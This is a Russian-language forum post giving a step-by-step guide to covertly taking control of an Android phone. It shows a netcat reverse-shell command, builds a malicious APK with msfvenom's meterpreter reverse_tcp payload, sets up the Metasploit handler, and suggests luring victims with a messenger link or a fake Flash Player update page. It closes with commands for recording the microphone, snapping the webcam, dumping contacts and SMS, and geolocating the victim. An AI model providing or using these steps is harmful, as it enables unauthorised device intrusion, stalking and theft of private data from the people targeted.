Перейти к публикации
Abeliniyadefort

Как получить доступ к Android?

Автор: Abeliniyadefort,

Рекомендованные сообщения

Abeliniyadefort    3

Abeliniyadefort

Принцип работы

Простыми словами, сначала мы создадим приложение(payload), потом определенным образом доставим жертве, а в конце у нас будет сессия meterpreter. Все операции выполняются с помощью утилит на базе операционной системы Kali Linux.

Принцип работы проще всего понять на примере двух окон терминала. Представим, что это жертва и хакер. Последний запускает в себя команду в терминале:

nc -l -p 8577

Жертва в свою очередь подключается к этому открытому порту:

nc 192.168.1.1 8577 -e /bin/bash

Таким образом, произошло подключение к открытому порту. Теперь в первом терминале можно запустить несколько команд, которые можно использовать на машине жертвы.

Вот по такому принципу мы будет работать с android. Принцип работы с payload может быть намного сложнее, но в этом основная суть.

Создание payload

Открываем терминал и с помощью такого набора создаем приложение с расширением. apk, которое будет доступно в корневой директории. Вместо звездочки нужно указать свой IP. Можно быстро посмотреть в терминале с помощью команды ifconfig:

msfvenom -p android/meterpreter/reverse_tcp LHOST=* LPORT=4444 R >shell.apk

После выполнения команды в корневой директории будет создан файл shell.apk.

7bb18bf622adb151f6bf8.png
shell.apk

Далее необходимо запустить msfconsole.

msfconsole
48ad8d4cf4050bd4d4f7c.png
msfconsole

После этого последовательно выполняем все команды:

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST ВашIP
set LPORT 4444
exploit

После этого, жертва должна сказать и запустить наш shell.apk. Как это сделать – это философский вопрос. Можно отправить ссылку в мессенджер. Можно, как вариант сделать сайт с заглушкой под обновление флеш плера. Таким образом, пользователь зайдет и начнет скачивать обновление. После этого будет установлена сессия удаленного управления.

Некоторые полезные команды:

record_mic

webcam_snap

webcam_stream

dump_contacts

dump_sms

geolocate

После установления сессии на телефоне не происходит никаких действий. Можно спокойно удаленно следить за жертвой, если у нее будет активное интернет соединение. 

  • Like 3

Поделиться сообщением

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
Перейти к списку тем
×
×
  • Создать...